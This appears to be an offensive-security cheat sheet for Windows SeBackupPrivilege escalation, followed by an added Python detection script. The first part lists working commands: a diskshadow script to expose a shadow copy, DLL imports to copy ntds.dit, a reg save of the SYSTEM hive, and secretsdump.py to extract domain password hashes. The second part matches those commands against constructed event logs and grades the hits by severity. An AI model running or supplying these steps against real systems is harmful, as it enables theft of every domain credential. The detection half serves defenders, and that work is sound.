SeBackupPrivilege Escalation

  • Check user privileges to escalate

Usage

  • Run whoami /all to list the current user's privileges
  • SeBackupPrivilege must be present
  • Reference: PayloadsAllTheThings
  • Upload diskshadow.txt to the target with the following content. There has to be a space at the end of each line!
set metadata C:\tmp\tmp.cabs 
set context persistent nowriters 
add volume c: alias someAlias 
create 
expose %someAlias% h: 
  • Change directory to C:\Windows\System32 and run diskshadow.exe /s C:\tmp\diskshadow.txt
  • Upload these DLLs to the target
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
reg save HKLM\SYSTEM C:\tmp\system
  • Download the files ntds.dit and system
  • Extract the hashes via
secretsdump.py -system system -ntds ntds.dit LOCAL > out.txt
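
For defenders, the command lines in the steps above are the detection surface. The following is an added example, not part of the original page or of the tools it references: it matches those commands against constructed process-creation (Security 4688) and PowerShell script block (4104) records. The rule names, hosts, users and the "high"/"review" grading are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Patterns derived from the commands listed on this page.
RULES = {
    "diskshadow_script_mode": re.compile(r"diskshadow(?:\.exe)?\s+/s\s+\S+", re.I),
    "ntds_dit_access": re.compile(r"\\ntds\\ntds\.dit", re.I),
    "system_hive_save": re.compile(
        r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\system\b", re.I),
    "sebackup_module_load": re.compile(r"SeBackupPrivilege(?:Utils|CmdLets)\.dll", re.I),
}

# Constructed sample records (host, user, event id, text); not real logs.
# 4688 = process creation with command line, 4104 = PowerShell script block.
SAMPLE_EVENTS = [
    ("DC01", "svc_backup", 4688, r"diskshadow.exe /s C:\tmp\diskshadow.txt"),
    ("DC01", "svc_backup", 4104, r"import-module .\SeBackupPrivilegeUtils.dll"),
    ("DC01", "svc_backup", 4104,
     r"copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite"),
    ("DC01", "svc_backup", 4688, r"reg save HKLM\SYSTEM C:\tmp\system"),
    ("FS02", "admin1", 4688, r"vssadmin list shadows"),
    ("FS02", "admin1", 4688, r"reg query HKLM\SYSTEM\CurrentControlSet\Services"),
    ("WS07", "alice", 4688, r"reg save HKLM\SYSTEM D:\backup\system.hiv"),
]


def match_rules(text):
    """Return the sorted names of all rules whose pattern occurs in text."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))


def triage(events):
    """Group rule hits per (host, user) and grade each combination."""
    hits = defaultdict(set)
    for host, user, _event_id, text in events:
        hits[(host, user)].update(match_rules(text))
    findings = {}
    for key, names in hits.items():
        # A scripted shadow copy plus access to ntds.dit or the SYSTEM hive is
        # the full sequence from this page; any lesser hit is graded "review".
        staged = "diskshadow_script_mode" in names
        looted = names & {"ntds_dit_access", "system_hive_save"}
        if names:
            findings[key] = ("high" if staged and looted else "review", sorted(names))
    return findings


if __name__ == "__main__":
    for (host, user), (level, names) in triage(SAMPLE_EVENTS).items():
        print(f"{level:6} {host} {user}: {', '.join(names)}")
```

The PowerShell steps only show up if script block logging is enabled, and the 4688 matches require command-line auditing for process creation.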